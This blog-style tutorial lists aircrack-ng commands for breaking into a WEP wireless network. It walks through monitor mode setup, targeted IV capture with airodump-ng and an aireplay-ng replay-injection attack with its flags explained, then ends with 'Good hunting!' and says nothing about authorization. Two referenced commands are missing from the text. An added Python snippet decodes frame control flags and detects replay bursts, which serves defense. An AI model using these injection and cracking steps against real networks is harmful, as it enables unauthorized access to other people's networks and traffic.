The following is a quick-hit list of commands for attacking a WEP wireless network. It assumes you are using a 2016 variant of Kali Linux with the aircrack-ng suite installed and a wireless network card that can be placed into monitor mode (which should be about 100% of them). It also assumes that there is a WEP network with an associated client that is transmitting, and that you are running as a user with sufficient permissions to execute each of these commands.
For the sake of this tutorial the AP will be assumed to have a MAC address of “DE:AD:DE:AD:DE:AD” and the client will be assumed to have a MAC address of “BE:AD:ED:BE:AD:ED”. The wireless network card we will use will be assumed to be “wlan0”.
UPDATE 2017-01-01: If a presentation is more your style of learning you can access training on this topic here: Wireless Attacks – WEP (basic_0x00)
First up, boot up Kali and shut down any processes that could interfere with monitor mode:
airmon-ng check kill
Then put the interface into monitor mode (airmon-ng creates a monitor-mode interface named wlan0mon, which is the interface the remaining commands use):
airmon-ng start wlan0
Next up, run airodump-ng on the monitor interface to find the target WEP network:
Make sure to note the client (BE:AD:ED:BE:AD:ED for our example), the AP (DE:AD:DE:AD:DE:AD for our example), and the channel (10 for our example), then exit airodump-ng with CTRL+C. Now restart airodump-ng, locked to that channel and BSSID, to capture the IVs for the network:
airodump-ng --channel 10 --bssid DE:AD:DE:AD:DE:AD -w wep-capture --ivs wlan0mon
Leave that running, then jump over to a new window/terminal and start injecting to stimulate IV creation. We’ll use a modified packet approach, since a suitable packet to replay is a bit easier to find:
aireplay-ng -2 -b DE:AD:DE:AD:DE:AD -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon
To break that down a bit:
- -2 means modified packet attack
- -b means the AP address
- -t 1 means to look for a candidate packet that has the “To Distribution System” (To DS) flag set
- -c means the destination address (broadcast in this case)
- -p 0841 means to set the frame control field of the replayed packet to 0841, which sets the “To Distribution System” flag
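As an added example (not part of the original post or of the aircrack-ng project), the following Python decodes the frame control word that -p 0841 sets and, over a constructed sample capture, flags the burst of one identical protected To DS frame that this kind of replay injection produces, which is what a wireless IDS watches for. The frame dictionary layout, the body hashes and the threshold are assumptions made for the example.

```python
from collections import Counter

# 802.11 frame control word as aireplay-ng -p takes it: first hex byte holds
# protocol version/type/subtype, second hex byte holds the flag bits.
FLAG_BITS = {
    0x01: "ToDS", 0x02: "FromDS", 0x04: "MoreFrag", 0x08: "Retry",
    0x10: "PwrMgt", 0x20: "MoreData", 0x40: "Protected", 0x80: "Order",
}
FRAME_TYPES = {0: "mgmt", 1: "ctrl", 2: "data", 3: "ext"}


def decode_frame_control(fc_hex):
    """Decode a 4-hex-digit frame control word, e.g. "0841"."""
    word = int(fc_hex, 16)
    type_byte, flag_byte = word >> 8, word & 0xFF   # "0841" -> 0x08, 0x41
    return {
        "type": FRAME_TYPES[(type_byte >> 2) & 0x3],
        "subtype": (type_byte >> 4) & 0xF,
        "flags": [name for bit, name in FLAG_BITS.items() if flag_byte & bit],
    }


def detect_replay(frames, threshold=20):
    """Return (src, dst) pairs whose identical protected To DS data frame
    repeats more than `threshold` times. A real client does not resend the
    same ciphertext over and over, so such a burst indicates replay injection."""
    counts = Counter()
    for frame in frames:
        fc = decode_frame_control(frame["fc"])
        if fc["type"] == "data" and {"ToDS", "Protected"} <= set(fc["flags"]):
            counts[(frame["src"], frame["dst"], frame["body"])] += 1
    return sorted({(s, d) for (s, d, _), n in counts.items() if n > threshold})


# Constructed sample capture (assumed format: one dict per frame, "body" is a
# hash of the encrypted payload): a burst of one replayed broadcast frame from
# the client, a few genuine client frames, and some AP-to-client traffic.
SAMPLE_FRAMES = (
    [{"src": "BE:AD:ED:BE:AD:ED", "dst": "FF:FF:FF:FF:FF:FF",
      "fc": "0841", "body": "c3f1a2"}] * 60
    + [{"src": "BE:AD:ED:BE:AD:ED", "dst": "DE:AD:DE:AD:DE:AD",
        "fc": "0841", "body": "body%d" % i} for i in range(5)]
    + [{"src": "DE:AD:DE:AD:DE:AD", "dst": "BE:AD:ED:BE:AD:ED",
        "fc": "0842", "body": "aabbcc"}] * 3
)

if __name__ == "__main__":
    print(decode_frame_control("0841"))   # data frame, flags ToDS + Protected
    print(detect_replay(SAMPLE_FRAMES))   # [('BE:AD:ED:BE:AD:ED', 'FF:FF:FF:FF:FF:FF')]
```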
Now in a third window/terminal start the crack with aircrack-ng against the capture file:
Select the target network, and let it sit. It will automatically poll the capture file and retry each time the next IV-count threshold is reached, until the key is recovered. Remember that you need to try both “Open” and “Shared” key types as well as each key number to properly join the target network. Good hunting!